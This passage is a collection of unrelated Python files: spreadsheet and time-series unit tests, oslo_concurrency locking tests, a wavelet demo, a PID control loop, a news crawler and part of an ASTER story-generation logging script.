xw.Book('cell_errors.xlsx') sheet = wb.sheets[0] for i in range(1, 8): self.assertIsNone(sheet.range((i, 1)).value) wb.close() class TestMerging(TestBase): def test_merge(self): sheet = self.wb1.sheets[0] self.assertEqual(sheet['A1'].merge_area, sheet['A1']) self.assertEqual(sheet['A1'].merge_cells, False) sheet["A1:A2"].merge() self.assertEqual(sheet['A1'].merge_area, sheet['A1:A2']) self.assertEqual(sheet['A1'].merge_cells, True) sheet["A1:B2"].merge() self.assertEqual(sheet['A1'].merge_area, sheet['A1:B2']) sheet["A1:B2"].unmerge() self.assertEqual(sheet['A1'].merge_area, sheet['A1']) sheet["A1:B2"].merge(True) self.assertEqual(sheet['A1'].merge_area, sheet['A1:B1']) if __name__ == '__main__': unittest.main()
python
#!/usr/bin/env python # -*- coding: utf-8 -*- import pylab import numpy import Image # PIL from supreme.lib import pywt im = Image.open("data/aero.png").convert('L') arr = numpy.fromstring(im.tostring(), numpy.uint8) arr.shape = (im.size[1], im.size[0]) pylab.imshow(arr, interpolation="nearest", cmap=pylab.cm.gray) for LL, (LH, HL, HH) in pywt.swt2(arr, 'bior1.3', level=3, start_level=0): pylab.figure() for i,a in enumerate([LL, LH, HL, HH]): pylab.subplot(2,2,i+1) pylab.imshow(a, origin='image', interpolation="nearest", cmap=pylab.cm.gray) pylab.show()
python
import sys import math def count_digit(p1, p2): l1 = len(str(p1)) l2 = len(str(p2)) count = 0 for i in range(l1, l2+1): if i == l1: st = p1 else: st = 10**(i-1) if i == l2: ed = p2 else: ed = 10**i - 1 count += (ed - st + 1) * i return count def dichotomic_search(p1, p2, target): pin = p1 pout = p2 p = p1 while pout - pin > 1: p = (pin + pout) // 2 count = count_digit(p1, p) if count == target: return p elif count < target: pin = p else: pout = p p = p - 1 return p n = int(input()) for i in range(n): st, ed = [int(j) for j in input().split()] target_count = count_digit(st, ed) // 2 page = dichotomic_search(st, ed, target_count) print(page)
python
from utils import pandaman, handyman from feature_extraction import data_loader from feature_extraction import feature_preprocessor import numpy as np import pandas as pd import os import matplotlib.pyplot as plt plt.style.use('ggplot') if __name__ == '__main__': train_data, test_data = data_loader.create_flat_intervals_structure() # print(os.path.join(".", "moving_avg_data.pkl")) # train_data_mvng_avg = feature_preprocessor.reduce_noise(train_data.copy(), "moving_avg") # handyman.dump_pickle(train_data_mvng_avg, os.path.join(".", "moving_avg_data.pkl")) # train_data_butter = feature_preprocessor.reduce_noise(train_data.copy(), "butter") # handyman.dump_pickle(train_data_butter, os.path.join(".", "butter_data.pkl")) # train_data_gaussian = feature_preprocessor.reduce_noise(train_data.copy(), "guassian") # handyman.dump_pickle(train_data_gaussian, os.path.join(".", "gaussian_data.pkl")) train_data_rolling = handyman.load_pickle(os.path.join(".", "rolling_data.pkl")) train_data_mvng_avg = handyman.load_pickle(os.path.join(".", "moving_avg_data.pkl")) train_data_butter = handyman.load_pickle(os.path.join(".", "butter_data.pkl")) train_data_gaussian = handyman.load_pickle(os.path.join(".", "gaussian_data.pkl")) plt.figure() plt.plot(np.arange(0,2,0.01), train_data.loc[20, "interval_data"].iloc[:, 0], label='Before smoothing', color='blue', linestyle=':', linewidth=2) plt.plot(np.arange(0,2,0.01), train_data_butter.loc[20, "interval_data"].iloc[:, 0], label='Butterworth', color='red', linewidth=1) plt.plot(np.arange(0,2,0.01), train_data_gaussian.loc[20, "interval_data"].iloc[:, 0], label='Gaussian', color='yellow', linewidth=1) plt.plot(np.arange(0,2,0.01), train_data_rolling.loc[20, "interval_data"].iloc[:, 0], label='Rolling average', color='green', linewidth=1) plt.title("Acceloremeter X before and after smoothing") plt.legend(loc="lower right") plt.show()
python
import numpy as np import pandas as pd import pytest from dku_timeseries import IntervalRestrictor from recipe_config_loading import get_interval_restriction_params @pytest.fixture def datetime_column(): return "Date" @pytest.fixture def df(datetime_column): co2 = [315.58, 316.39, 316.79, 316.2] country = ["first", "first", "second", "second"] time_index = pd.date_range("1-1-1959", periods=4, freq="M") df = pd.DataFrame.from_dict( {"value1": co2, "value2": co2, "country": country, datetime_column: time_index}) return df @pytest.fixture def long_df(datetime_column): co2 = [315.58, 316.39, 100, 116.2, 345, 234, 201, 100] country = ["first", "first", "first", "first", "second", "second", "second", "second"] time_index = pd.date_range("1-1-1959", periods=4, freq="D").append(pd.date_range("1-1-1959", periods=4, freq="D")) df = pd.DataFrame.from_dict( {"value1": co2, "value2": co2, "country": country, datetime_column: time_index}) return df @pytest.fixture def long_df_2(datetime_column): co2 = [315.58, 316.39, 316.79, 316.2, 9, 10] country = ["first", "first", "second", "second", "third", "third"] country_2 = ["first", "first", "second", "second", "third", "third"] time_index = pd.date_range("1-1-1959", periods=2, freq="M").append(pd.date_range("1-1-1959", periods=2, freq="M")).append( pd.date_range("1-1-1959", periods=2, freq="M")) df = pd.DataFrame.from_dict( {"value1": co2, "value2": co2, "country": country, "item": country_2, datetime_column: time_index}) return df @pytest.fixture def long_df_3(datetime_column): co2 = [315.58, 316.39, 316.79, 316.2, 9, 319, 250, 300] country = ["first", "first", "second", "second", "third", "third", "fourth", "fourth"] country_2 = ["first", "first", "second", "second", "third", "third", "fourth", "fourth"] country_3 = ["first", "first", "second", "second", "third", "third", "fourth", "fourth"] time_index = pd.date_range("1-1-1959", periods=2, freq="M").append(pd.date_range("1-1-1959", periods=2, freq="M")).append( pd.date_range("1-1-1959", periods=2, freq="M")).append(pd.date_range("1-1-1959", periods=2, freq="M")) df = pd.DataFrame.from_dict( {"value1": co2, "value2": co2, "country": country, "item": country_2, "store": country_3, datetime_column: time_index}) return df @pytest.fixture def long_df_4(datetime_column): co2 = [315.58, 316.39, 316.79, 316.2, 9, 319, 250, 300] country = ["first", "first", "second", "second", "third", "third", "first", "first"] country_2 = ["first", "first", "second", "second", "third", "third", "second", "first"] country_3 = ["first", "first", "second", "second", "third", "third", "third", "fourth"] time_index = pd.date_range("1-1-2020", periods=2, freq="M").append(pd.date_range("1-1-2020", periods=2, freq="M")).append( pd.date_range("1-1-2020", periods=2, freq="M")).append(pd.date_range("1-1-2020", periods=2, freq="M")) df = pd.DataFrame.from_dict( {"value1": co2, "value2": co2, "country": country, "item": country_2, "store": country_3, datetime_column: time_index}) return df @pytest.fixture def long_df_numerical(datetime_column): co2 = [315.58, 316.39, 100, 116.2, 345, 234, 201, 100] country = [1, 1, 1, 1, 2, 2, 2, 2] time_index = pd.date_range("1-1-1959", periods=4, freq="D").append(pd.date_range("1-1-1959", periods=4, freq="D")) df = pd.DataFrame.from_dict( {"value1": co2, "value2": co2, "country": country, datetime_column: time_index}) return df @pytest.fixture def recipe_config(datetime_column): config = {u'groupby_columns': [u'country'], u'max_threshold': 320, u'min_threshold': 200, u'datetime_column': u'Date', u'advanced_activated': True, u'time_unit': u'days', u'min_deviation_duration_value': 0, u'value_column': u'value1', u'min_valid_values_duration_value': 0} return config @pytest.fixture def threshold_dict(recipe_config): min_threshold = recipe_config.get('min_threshold') max_threshold = recipe_config.get('max_threshold') value_column = recipe_config.get('value_column') threshold_dict = {value_column: (min_threshold, max_threshold)} return threshold_dict @pytest.fixture def params(recipe_config): return get_interval_restriction_params(recipe_config) class TestIntervalLongFormat: def test_long_format(self, long_df, params, recipe_config, threshold_dict, datetime_column): groupby_columns = ["country"] interval_restrictor = IntervalRestrictor(params) output_df = interval_restrictor.compute(long_df, datetime_column, threshold_dict, groupby_columns=groupby_columns) np.testing.assert_array_equal(output_df.Date.values, pd.DatetimeIndex(['1959-01-01T00:00:00.000000000', '1959-01-02T00:00:00.000000000', '1959-01-02T00:00:00.000000000', '1959-01-03T00:00:00.000000000'])) def test_two_identifiers(self, long_df_2, params, recipe_config, threshold_dict, datetime_column): groupby_columns = ["country", "item"] interval_restrictor = IntervalRestrictor(params) output_df = interval_restrictor.compute(long_df_2, datetime_column, threshold_dict, groupby_columns=groupby_columns) np.testing.assert_array_equal(output_df.Date.values, pd.DatetimeIndex(['1959-01-31T00:00:00.000000000', '1959-02-28T00:00:00.000000000', '1959-01-31T00:00:00.000000000', '1959-02-28T00:00:00.000000000'])) def test_three_identifiers(self, long_df_3, params, recipe_config, threshold_dict, datetime_column): groupby_columns = ["country", "item", "store"] interval_restrictor = IntervalRestrictor(params) output_df = interval_restrictor.compute(long_df_3, datetime_column, threshold_dict, groupby_columns=groupby_columns) np.testing.assert_array_equal(output_df.Date.values, pd.DatetimeIndex(['1959-01-31T00:00:00.000000000', '1959-02-28T00:00:00.000000000', '1959-01-31T00:00:00.000000000', '1959-02-28T00:00:00.000000000', '1959-01-31T00:00:00.000000000', '1959-02-28T00:00:00.000000000', '1959-02-28T00:00:00.000000000'])) def test_mix_identifiers(self, long_df_4, params, recipe_config, threshold_dict, datetime_column): groupby_columns = ["country", "item", "store"] interval_restrictor = IntervalRestrictor(params) output_df = interval_restrictor.compute(long_df_4, datetime_column, threshold_dict, groupby_columns=groupby_columns) np.testing.assert_array_equal(output_df.Date.values, pd.DatetimeIndex(['2020-01-31T00:00:00.000000000', '2020-02-29T00:00:00.000000000', '2020-02-29T00:00:00.000000000', '2020-01-31T00:00:00.000000000', '2020-01-31T00:00:00.000000000', '2020-02-29T00:00:00.000000000', '2020-02-29T00:00:00.000000000'])) def test_empty_identifiers(self, df, params, recipe_config, threshold_dict, datetime_column): interval_restrictor = IntervalRestrictor(params) output_df = interval_restrictor.compute(df, datetime_column, threshold_dict, groupby_columns=[]) assert output_df.shape == (4, 5) output_df = interval_restrictor.compute(df, datetime_column, threshold_dict) assert output_df.shape == (4, 5) output_df = interval_restrictor.compute(df, datetime_column, threshold_dict, groupby_columns=None) assert output_df.shape == (4, 5) def test_long_format_numerical(self, long_df_numerical, params, recipe_config, threshold_dict, datetime_column): groupby_columns = ["country"] interval_restrictor = IntervalRestrictor(params) output_df = interval_restrictor.compute(long_df_numerical, datetime_column, threshold_dict, groupby_columns=groupby_columns) np.testing.assert_array_equal(output_df.Date.values, pd.DatetimeIndex(['1959-01-01T00:00:00.000000000', '1959-01-02T00:00:00.000000000', '1959-01-02T00:00:00.000000000', '1959-01-03T00:00:00.000000000'])) np.testing.assert_array_equal(output_df.country.values, np.array([1, 1, 2, 2]))
python
# Dan Thayer # PID control servo motor and distance sensor.. just messing around from range_sensor import measure_distance # gains k_p = 1.0 k_d = 1.0 k_i = 0.001 def run(target_dist, debug=False): """ Sense distance and drive motor towards a given target :param target_dist: distance in cm :return: """ sum_err = 0.0 last_err = 0.0 while 1: dist = measure_distance() err = target_dist - dist sum_err += err signal = k_p*err + k_i*sum_err + k_d*(err-last_err) control(signal) last_err = err if debug: print("dist={}, err={}, sum={}, signal={}".format(dist, err, sum_err, signal)) def control(input): print("control w/ input ", input) if __name__ == "__main__": print("starting control loop...") run(target_dist=4.0, debug=True)
python
# Copyright 2011 Justin Santa Barbara # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import collections import multiprocessing import os import shutil import signal import subprocess import sys import tempfile import threading import time from oslo_config import cfg from oslotest import base as test_base import six from oslo_concurrency.fixture import lockutils as fixtures from oslo_concurrency import lockutils from oslo_config import fixture as config if sys.platform == 'win32': import msvcrt else: import fcntl def lock_file(handle): if sys.platform == 'win32': msvcrt.locking(handle.fileno(), msvcrt.LK_NBLCK, 1) else: fcntl.flock(handle, fcntl.LOCK_EX | fcntl.LOCK_NB) def unlock_file(handle): if sys.platform == 'win32': msvcrt.locking(handle.fileno(), msvcrt.LK_UNLCK, 1) else: fcntl.flock(handle, fcntl.LOCK_UN) def lock_files(handles_dir, out_queue): with lockutils.lock('external', 'test-', external=True): # Open some files we can use for locking handles = [] for n in range(50): path = os.path.join(handles_dir, ('file-%s' % n)) handles.append(open(path, 'w')) # Loop over all the handles and try locking the file # without blocking, keep a count of how many files we # were able to lock and then unlock. If the lock fails # we get an IOError and bail out with bad exit code count = 0 for handle in handles: try: lock_file(handle) count += 1 unlock_file(handle) except IOError: os._exit(2) finally: handle.close() return out_queue.put(count) class LockTestCase(test_base.BaseTestCase): def setUp(self): super(LockTestCase, self).setUp() self.config = self.useFixture(config.Config(lockutils.CONF)).config def test_synchronized_wrapped_function_metadata(self): @lockutils.synchronized('whatever', 'test-') def foo(): """Bar.""" pass self.assertEqual('Bar.', foo.__doc__, "Wrapped function's docstring " "got lost") self.assertEqual('foo', foo.__name__, "Wrapped function's name " "got mangled") def test_lock_internally_different_collections(self): s1 = lockutils.Semaphores() s2 = lockutils.Semaphores() trigger = threading.Event() who_ran = collections.deque() def f(name, semaphores, pull_trigger): with lockutils.internal_lock('testing', semaphores=semaphores): if pull_trigger: trigger.set() else: trigger.wait() who_ran.append(name) threads = [ threading.Thread(target=f, args=(1, s1, True)), threading.Thread(target=f, args=(2, s2, False)), ] for thread in threads: thread.start() for thread in threads: thread.join() self.assertEqual([1, 2], sorted(who_ran)) def test_lock_internally(self): """We can lock across multiple threads.""" saved_sem_num = len(lockutils._semaphores) seen_threads = list() def f(_id): with lockutils.lock('testlock2', 'test-', external=False): for x in range(10): seen_threads.append(_id) threads = [] for i in range(10): thread = threading.Thread(target=f, args=(i,)) threads.append(thread) thread.start() for thread in threads: thread.join() self.assertEqual(100, len(seen_threads)) # Looking at the seen threads, split it into chunks of 10, and verify # that the last 9 match the first in each chunk. for i in range(10): for j in range(9): self.assertEqual(seen_threads[i * 10], seen_threads[i * 10 + 1 + j]) self.assertEqual(saved_sem_num, len(lockutils._semaphores), "Semaphore leak detected") def test_lock_internal_fair(self): """Check that we're actually fair.""" def f(_id): with lockutils.lock('testlock', 'test-', external=False, fair=True): lock_holder.append(_id) lock_holder = [] threads = [] # While holding the fair lock, spawn a bunch of threads that all try # to acquire the lock. They will all block. Then release the lock # and see what happens. with lockutils.lock('testlock', 'test-', external=False, fair=True): for i in range(10): thread = threading.Thread(target=f, args=(i,)) threads.append(thread) thread.start() # Allow some time for the new thread to get queued onto the # list of pending writers before continuing. This is gross # but there's no way around it without using knowledge of # fasteners internals. time.sleep(0.5) # Wait for all threads. for thread in threads: thread.join() self.assertEqual(10, len(lock_holder)) # Check that the threads each got the lock in fair order. for i in range(10): self.assertEqual(i, lock_holder[i]) def test_fair_lock_with_semaphore(self): def do_test(): s = lockutils.Semaphores() with lockutils.lock('testlock', 'test-', semaphores=s, fair=True): pass self.assertRaises(NotImplementedError, do_test) def test_nested_synchronized_external_works(self): """We can nest external syncs.""" tempdir = tempfile.mkdtemp() try: self.config(lock_path=tempdir, group='oslo_concurrency') sentinel = object() @lockutils.synchronized('testlock1', 'test-', external=True) def outer_lock(): @lockutils.synchronized('testlock2', 'test-', external=True) def inner_lock(): return sentinel return inner_lock() self.assertEqual(sentinel, outer_lock()) finally: if os.path.exists(tempdir): shutil.rmtree(tempdir) def _do_test_lock_externally(self): """We can lock across multiple processes.""" handles_dir = tempfile.mkdtemp() try: children = [] for n in range(50): queue = multiprocessing.Queue() proc = multiprocessing.Process( target=lock_files, args=(handles_dir, queue)) proc.start() children.append((proc, queue)) for child, queue in children: child.join() count = queue.get(block=False) self.assertEqual(50, count) finally: if os.path.exists(handles_dir): shutil.rmtree(handles_dir, ignore_errors=True) def test_lock_externally(self): lock_dir = tempfile.mkdtemp() self.config(lock_path=lock_dir, group='oslo_concurrency') try: self._do_test_lock_externally() finally: if os.path.exists(lock_dir): shutil.rmtree(lock_dir, ignore_errors=True) def test_lock_externally_lock_dir_not_exist(self): lock_dir = tempfile.mkdtemp() os.rmdir(lock_dir) self.config(lock_path=lock_dir, group='oslo_concurrency') try: self._do_test_lock_externally() finally: if os.path.exists(lock_dir): shutil.rmtree(lock_dir, ignore_errors=True) def test_synchronized_with_prefix(self): lock_name = 'mylock' lock_pfix = 'mypfix-' foo = lockutils.synchronized_with_prefix(lock_pfix) @foo(lock_name, external=True) def bar(dirpath, pfix, name): return True lock_dir = tempfile.mkdtemp() self.config(lock_path=lock_dir, group='oslo_concurrency') self.assertTrue(bar(lock_dir, lock_pfix, lock_name)) def test_synchronized_without_prefix(self): lock_dir = tempfile.mkdtemp() self.config(lock_path=lock_dir, group='oslo_concurrency') @lockutils.synchronized('lock', external=True) def test_without_prefix(): # We can't check much pass try: test_without_prefix() finally: if os.path.exists(lock_dir): shutil.rmtree(lock_dir, ignore_errors=True) def test_synchronized_prefix_without_hypen(self): lock_dir = tempfile.mkdtemp() self.config(lock_path=lock_dir, group='oslo_concurrency') @lockutils.synchronized('lock', 'hypen', True) def test_without_hypen(): # We can't check much pass try: test_without_hypen() finally: if os.path.exists(lock_dir): shutil.rmtree(lock_dir, ignore_errors=True) def test_contextlock(self): lock_dir = tempfile.mkdtemp() self.config(lock_path=lock_dir, group='oslo_concurrency') try: # Note(flaper87): Lock is not external, which means # a semaphore will be yielded with lockutils.lock("test") as sem: if six.PY2: self.assertIsInstance(sem, threading._Semaphore) else: self.assertIsInstance(sem, threading.Semaphore) # NOTE(flaper87): Lock is external so an InterProcessLock # will be yielded. with lockutils.lock("test2", external=True) as lock: self.assertTrue(lock.exists()) with lockutils.lock("test1", external=True) as lock1: self.assertIsInstance(lock1, lockutils.InterProcessLock) finally: if os.path.exists(lock_dir): shutil.rmtree(lock_dir, ignore_errors=True) def test_contextlock_unlocks(self): lock_dir = tempfile.mkdtemp() self.config(lock_path=lock_dir, group='oslo_concurrency') sem = None try: with lockutils.lock("test") as sem: if six.PY2: self.assertIsInstance(sem, threading._Semaphore) else: self.assertIsInstance(sem, threading.Semaphore) with lockutils.lock("test2", external=True) as lock: self.assertTrue(lock.exists()) # NOTE(flaper87): Lock should be free with lockutils.lock("test2", external=True) as lock: self.assertTrue(lock.exists()) # NOTE(flaper87): Lock should be free # but semaphore should already exist. with lockutils.lock("test") as sem2: self.assertEqual(sem, sem2) finally: if os.path.exists(lock_dir): shutil.rmtree(lock_dir, ignore_errors=True) def _test_remove_lock_external_file(self, lock_dir, use_external=False): lock_name = 'mylock' lock_pfix = 'mypfix-remove-lock-test-' if use_external: lock_path = lock_dir else: lock_path = None lockutils.remove_external_lock_file(lock_name, lock_pfix, lock_path) for ent in os.listdir(lock_dir): self.assertRaises(OSError, ent.startswith, lock_pfix) if os.path.exists(lock_dir): shutil.rmtree(lock_dir, ignore_errors=True) def test_remove_lock_external_file(self): lock_dir = tempfile.mkdtemp() self.config(lock_path=lock_dir, group='oslo_concurrency') self._test_remove_lock_external_file(lock_dir) def test_remove_lock_external_file_lock_path(self): lock_dir = tempfile.mkdtemp() self._test_remove_lock_external_file(lock_dir, use_external=True) def test_no_slash_in_b64(self): # base64(sha1(foobar)) has a slash in it with lockutils.lock("foobar"): pass def test_deprecated_names(self): paths = self.create_tempfiles([['fake.conf', '\n'.join([ '[DEFAULT]', 'lock_path=foo', 'disable_process_locking=True']) ]]) conf = cfg.ConfigOpts() conf(['--config-file', paths[0]]) conf.register_opts(lockutils._opts, 'oslo_concurrency') self.assertEqual('foo', conf.oslo_concurrency.lock_path) self.assertTrue(conf.oslo_concurrency.disable_process_locking) class FileBasedLockingTestCase(test_base.BaseTestCase): def setUp(self): super(FileBasedLockingTestCase, self).setUp() self.lock_dir = tempfile.mkdtemp() def test_lock_file_exists(self): lock_file = os.path.join(self.lock_dir, 'lock-file') @lockutils.synchronized('lock-file', external=True, lock_path=self.lock_dir) def foo(): self.assertTrue(os.path.exists(lock_file)) foo() def test_interprocess_lock(self): lock_file = os.path.join(self.lock_dir, 'processlock') pid = os.fork() if pid: # Make sure the child grabs the lock first start = time.time() while not os.path.exists(lock_file): if time.time() - start > 5: self.fail('Timed out waiting for child to grab lock') time.sleep(0) lock1 = lockutils.InterProcessLock('foo') lock1.lockfile = open(lock_file, 'w') # NOTE(bnemec): There is a brief window between when the lock file # is created and when it actually becomes locked. If we happen to # context switch in that window we may succeed in locking the # file. Keep retrying until we either get the expected exception # or timeout waiting. while time.time() - start < 5: try: lock1.trylock() lock1.unlock() time.sleep(0) except IOError: # This is what we expect to happen break else: self.fail('Never caught expected lock exception') # We don't need to wait for the full sleep in the child here os.kill(pid, signal.SIGKILL) else: try: lock2 = lockutils.InterProcessLock('foo') lock2.lockfile = open(lock_file, 'w') have_lock = False while not have_lock: try: lock2.trylock() have_lock = True except IOError: pass finally: # NOTE(bnemec): This is racy, but I don't want to add any # synchronization primitives that might mask a problem # with the one we're trying to test here. time.sleep(.5) os._exit(0) def test_interthread_external_lock(self): call_list = [] @lockutils.synchronized('foo', external=True, lock_path=self.lock_dir) def foo(param): """Simulate a long-running threaded operation.""" call_list.append(param) # NOTE(bnemec): This is racy, but I don't want to add any # synchronization primitives that might mask a problem # with the one we're trying to test here. time.sleep(.5) call_list.append(param) def other(param): foo(param) thread = threading.Thread(target=other, args=('other',)) thread.start() # Make sure the other thread grabs the lock # NOTE(bnemec): File locks do not actually work between threads, so # this test is verifying that the local semaphore is still enforcing # external locks in that case. This means this test does not have # the same race problem as the process test above because when the # file is created the semaphore has already been grabbed. start = time.time() while not os.path.exists(os.path.join(self.lock_dir, 'foo')): if time.time() - start > 5: self.fail('Timed out waiting for thread to grab lock') time.sleep(0) thread1 = threading.Thread(target=other, args=('main',)) thread1.start() thread1.join() thread.join() self.assertEqual(['other', 'other', 'main', 'main'], call_list) def test_non_destructive(self): lock_file = os.path.join(self.lock_dir, 'not-destroyed') with open(lock_file, 'w') as f: f.write('test') with lockutils.lock('not-destroyed', external=True, lock_path=self.lock_dir): with open(lock_file) as f: self.assertEqual('test', f.read()) class LockutilsModuleTestCase(test_base.BaseTestCase): def setUp(self): super(LockutilsModuleTestCase, self).setUp() self.old_env = os.environ.get('OSLO_LOCK_PATH') if self.old_env is not None: del os.environ['OSLO_LOCK_PATH'] def tearDown(self): if self.old_env is not None: os.environ['OSLO_LOCK_PATH'] = self.old_env super(LockutilsModuleTestCase, self).tearDown() def test_main(self): script = '\n'.join([ 'import os', 'lock_path = os.environ.get("OSLO_LOCK_PATH")', 'assert lock_path is not None', 'assert os.path.isdir(lock_path)', ]) argv = ['', sys.executable, '-c', script] retval = lockutils._lock_wrapper(argv) self.assertEqual(0, retval, "Bad OSLO_LOCK_PATH has been set") def test_return_value_maintained(self): script = '\n'.join([ 'import sys', 'sys.exit(1)', ]) argv = ['', sys.executable, '-c', script] retval = lockutils._lock_wrapper(argv) self.assertEqual(1, retval) def test_direct_call_explodes(self): cmd = [sys.executable, '-m', 'oslo_concurrency.lockutils'] with open(os.devnull, 'w') as devnull: retval = subprocess.call(cmd, stderr=devnull) self.assertEqual(1, retval) class TestLockFixture(test_base.BaseTestCase): def setUp(self): super(TestLockFixture, self).setUp() self.config = self.useFixture(config.Config(lockutils.CONF)).config self.tempdir = tempfile.mkdtemp() def _check_in_lock(self): self.assertTrue(self.lock.exists()) def tearDown(self): self._check_in_lock() super(TestLockFixture, self).tearDown() def test_lock_fixture(self): # Setup lock fixture to test that teardown is inside the lock self.config(lock_path=self.tempdir, group='oslo_concurrency') fixture = fixtures.LockFixture('test-lock') self.useFixture(fixture) self.lock = fixture.lock class TestGetLockPath(test_base.BaseTestCase): def setUp(self): super(TestGetLockPath, self).setUp() self.conf = self.useFixture(config.Config(lockutils.CONF)).conf def test_get_default(self): lockutils.set_defaults(lock_path='/the/path') self.assertEqual('/the/path', lockutils.get_lock_path(self.conf)) def test_get_override(self): lockutils._register_opts(self.conf) self.conf.set_override('lock_path', '/alternate/path', group='oslo_concurrency') self.assertEqual('/alternate/path', lockutils.get_lock_path(self.conf))
python
from urlparse import urlparse, urlunparse import re from bs4 import BeautifulSoup from .base import BaseCrawler from ...models import Author, AuthorType class CitizenCrawler(BaseCrawler): TL_RE = re.compile('(www\.)?citizen.co.za') def offer(self, url): """ Can this crawler process this URL? """ parts = urlparse(url) return bool(self.TL_RE.match(parts.netloc)) def canonicalise_url(self, url): """ Strip anchors, etc. """ url = super(CitizenCrawler, self).canonicalise_url(url) parts = urlparse(url) # force http, strip www, enforce trailing slash path = parts.path if not path.endswith('/'): path = path + '/' return urlunparse(['http', 'citizen.co.za', path, parts.params, None, None]) def extract(self, doc, raw_html): """ Extract text and other things from the raw_html for this document. """ super(CitizenCrawler, self).extract(doc, raw_html) soup = BeautifulSoup(raw_html) doc.title = self.extract_plaintext(soup.select(".post h1")) doc.summary = self.extract_plaintext(soup.select(".post .single-excerpt")) doc.text = doc.summary + "\n\n" + "\n\n".join(p.text for p in soup.select(".post .single-content > p")) doc.published_at = self.parse_timestamp(self.extract_plaintext(soup.select(".post .single-date"))) author = self.extract_plaintext(soup.select(".post .single-byline")) if author: doc.author = Author.get_or_create(author, AuthorType.journalist()) else: doc.author = Author.unknown()
python
import sys sys.path.insert(1, "../") import pickle from story_environment_neuro import * from decode_redo_pipeline_top_p_multi import Decoder import numpy as np from data_utils import * import argparse from memoryGraph_scifi2 import MemoryGraph import datetime from semantic_fillIn_class_offloaded_vn34 import FillIn from aster_utils import * from BERT_fill_class import * models = DataHolder(model_name="scifi") parser = argparse.ArgumentParser() parser.add_argument( "--config", help="path to json config", required=True ) args = parser.parse_args() config_filepath = args.config config = read_config(config_filepath) env = storyEnv(config['data']['verbose']) h = None c = None word2id, id2word = read_vocab(config['data']['vocab_file']) seq2seq_model = Decoder(config_path=config_filepath, top_n=config['data']['top_n']) src_data = read_bucket_data(word2id, id2word, src = config['data']['test_src'], config = None ) seeds = [x.split("|||")[0] for x in open("../data/bucketed_events_test_nameFix.txt", 'r').readlines()] fillObject = FillIn(models, verbose=config['data']['verbose'], remove_transitive=True) #test verbs verbs = ["fill-9.8", "suspect-81", "keep-15.2", "throw-17.1"] ###################################### def cleanBERT(string): while "[UNK]" in string: string = string.replace("[UNK]","") while "# " in string: string = string.replace("# ","#") while " #" in string: string = string.replace(" #","#") while "#" in string: string = string.replace("#","") while " ," in string: string = string.replace(" ,",",") while " ." in string: string = string.replace(" .",".") while " " in string: string = string.replace(" "," ") string = string.strip() return string def read_vocab(file_path): vocab = [word for word in pickle.load(open(file_path, 'rb'))] word2id = {} id2word = {} for ind, word in enumerate(vocab): word2id[word] = ind id2word[ind] = word return word2id, id2word def printPred(pred): x = "" if pred[0] == True: x = "not " print("<fact>"+x+rep(pred[1])+"("+rep(",".join(pred[2:]))+") </fact>") def printState(state): print("<state>") print("<!--Current story world state-->") state_keys = list(state.keys()) state_keys.sort() for entity in state_keys: if state[entity]: print("<entity>") print("<name>"+rep(entity)+"</name>") print("<facts>") for fact in state[entity]: if not type(fact) == str: printPred(fact) else: print("<fact>"+rep(fact)+"</fact>") print("</facts>") print("</entity>") print("</state>") def prepToPrint(event, memory): event = swapLastParams(event) unfilled = rep(str(event)) filled, memory = fillObject.fillEvent(event, memory) return unfilled, filled, memory def getAction(config, env, results, memory, history): if config['model']['causal'] == True: pruned_candidates = env.validate(results, memory, history, models, config['model']['forced_frame']) #print(f"NUM AFTER PRUNED (MAX {config['data']['top_n']}): {len(pruned_candidates)}") print(f"<numValidCandidates> {len(pruned_candidates)} out of {len(results)} possible </numValidCandidates>") if len(pruned_candidates) == 0: print("</step>\n</story>") print("No more candidate events!") env.reset() return None, env action = pruned_candidates[0] #this is a (event, manipulateState object) tuple #TODO: should env come from pruned_candidates? next_state = env.step(action) printState(next_state) return action, env else: if config['model']["original_mode"] == True: pruned_candidates = env.onlyFillPronouns(results, memory, history) else: pruned_candidates = env.nonCausal_validate(results, memory, history) if len(pruned_candidates) == 0: print("</step>\n</story>") print("No more candidate events!") env.reset() return None, env print(f"<numValidCandidates> {len(pruned_candidates)} out of {len(results)} possible </numValidCandidates>") action = pruned_candidates[0] return action, env def getSentence(filled_event, event, sentence_memory): #clean before BERT final_event = [] for i, param in enumerate(filled_event): if i != 1 and isVerbNet(event[i]): final_event += ["to",param] elif "EmptyParameter" in param: continue else: final_event += [param] #E2S max_masks = 3 sentence = BERT_fill(sentence_memory, final_event, max_masks) if sentence: sentence = cleanBERT(" ".join(sentence)) sentence = sentence.strip() while " " in sentence: sentence = sentence.replace(" "," ") print("SENTENCE",sentence) return sentence else: return "" ###################################### print('<?xml version="1.0" encoding="UTF-8" ?>') print(f"<!--{datetime.date.today()}-->") print("<!--**Version Information**-->") print(f"<!--CAUSAL: {config['model']['causal']}-->") if config['model']['causal']: print(f"<!--FORCE FIND VERBNET FRAME: {config['model']['forced_frame']}-->") print(f"<!--VERB RESAMPLING (for DRL): {config['model']['forced_frame']}-->") else: print(f"<!--PROPERLY FORMATED EVENTS ONLY: {not config['model']['original_mode']}-->") print("<!--#########################-->") print("<!--**About**-->") print("<!--Log file for ASTER story generator system. Each story has a number of steps. In each step, the system goes through a set of candidate events, determining if each is valid and giving reasons why or why not it is. Out of the valid events, the system selects one.-->") for j, event in enumerate(seeds): env.reset() event = event.split(" ") print("<story>") print("<!--A new story-->") memory = MemoryGraph(models) print("<step id=\""+str(0)+"\">") action, env = getAction(config, env, [event], memory, []) if not action: print("<error> Start event cannot be properly added to state </error>\n</story>") continue if type(action) == tuple: event = action[0] else: event = action print_event, filled_event, memory = prepToPrint(copy.deepcopy(event), memory) print("<startingEvent>\n<!--The user-given event to start the story-->\n"+print_event+ "</startingEvent>") print("<filledEvent>\n<!--An example of the event, randomly filled with real words-->\n"+str(filled_event)+"</filledEvent>") memory.add_event(event) history = [event] print("</step>") print_history = [filled_event] sentence = getSentence(filled_event, event, []) if not sentence: print("<error> Can't turn event "+str(filled_event)+" into a sentence. </error>\n</story>") continue sentence_memory = [sentence] #####Generate Events##### for i in range(0,5): #length of story #run through seq2seq/seq2seq2seq to get next distribution of events print("<step id=\""+str(i+1)+"\">") print("<!--Going through candidate 